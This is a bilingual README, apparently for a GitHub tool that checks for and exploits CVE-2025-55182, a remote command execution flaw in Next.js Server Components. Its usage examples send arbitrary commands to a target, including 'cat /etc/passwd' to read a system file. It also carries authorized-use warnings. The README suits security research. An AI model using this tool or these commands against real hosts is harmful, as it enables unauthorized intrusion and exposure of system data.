
CVE-2025-55182-Advanced-Scanner is an automated security tool designed to detect and validate the CVE-2025-55182 vulnerability efficiently. it helps security researchers and bug bounty hunters quickly identify affected targets with accurate results and minimal false positives.
一个专业且自动化的安全扫描器,用于检测和验证 CVE-2025-55182,这是一个影响 Next.js (React Server Components) 的严重漏洞。
专为安全研究人员、渗透测试人员和漏洞赏金猎人设计,提供快速、清晰且可靠的漏洞验证。
该漏洞源于对内部 RSC 请求和原型操作的错误处理,攻击者可借此执行系统级命令。
🔗 CVE 参考链接:
⚠️ 仅对您拥有或已获得明确授权的资产进行测试。
bashcurlopensslpython3 (可选,但推荐)git clone https://github.com/CyberPrince-hub/CVE-2025-55182-Advanced-Scanner.git
cd CVE-2025-55182-Advanced-Scanner
chmod +x scanner.sh
./scanner.sh -d <目标> -c <命令>
./scanner.sh -d vulnapp.com -c id
./scanner.sh -d http://localhost:3000 -c "ping -c 3 google.com"
./scanner.sh -d vulnapp.com -c "cat /etc/passwd"
⚠️ 免责声明
本项目严格限于教育和授权安全测试使用。
❌ 未经授权的测试属于违法行为。 作者对任何误用或损害概不负责。
👨💻 作者
Prince Roy
漏洞赏金猎人 | 网络安全学习者
📌 LinkedIn / GitHub:(在此处添加您的个人资料链接)
⭐ 支持与贡献
如果本项目对您有帮助:
⭐ 给仓库点星
🍴 Fork 并改进它
🐞 提交 Issue 或 PR